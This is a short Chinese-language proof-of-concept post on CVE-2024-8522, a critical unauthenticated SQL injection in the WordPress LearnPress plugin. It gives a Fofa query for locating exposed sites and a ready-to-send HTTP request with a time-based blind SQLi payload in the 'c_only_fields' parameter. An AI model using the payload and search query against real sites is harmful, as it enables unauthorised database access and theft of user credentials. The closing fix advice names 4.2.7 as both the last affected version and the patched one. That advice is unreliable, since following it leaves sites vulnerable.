WordPress LearnPress插件 SQL注入复现(CVE-2024-8522)

0x01 产品描述：

        LearnPress 是一款功能强大的 WordPress LMS（学习管理系统）插件，适用于创建和销售在线课程。凭借其直观的界面和丰富的功能，无论您是否具备编程背景，都能轻松搭建起在线教育网站。学会如何使用 LearnPress，意味着您可以快速地建立教育、学校或课程销售网站。

0x02 漏洞描述：

        LearnPress是一款广受欢迎的WordPress在线课程管理工具插件，近期被发现存在一个高危SQL注入漏洞，编号为CVE-2024-8522，其CVSS评分高达10，表明该漏洞具有极高的严重性。此漏洞潜藏于LearnPress的REST API端点中，具体关联到“c_only_fields”参数的处理不当，因缺乏足够的转义措施和SQL查询准备，使得未经身份验证的攻击者能够注入恶意SQL代码，进而可能访问并窃取存储在WordPress数据库中的敏感信息，如用户凭证、个人数据及课程资料

0x03 影响版本：

LearnPress <= 4.2.7

0x04 搜索语句：

Fofa:body="/wp-content/plugins/learnpress"

0x05 漏洞复现：

GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(5)),0) HTTP/1.1
Host: your-ip
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 35

0x06 修复建议：

厂商已发布4.2.7版本以修复该问题，存在问题的系统可更新至4.2.7用以修复

CVE-2024-8522 & CVE-2024-8529 (CVSS 10): LearnPress SQLi Flaw Leaves 90K+ WordPress Sites at Risk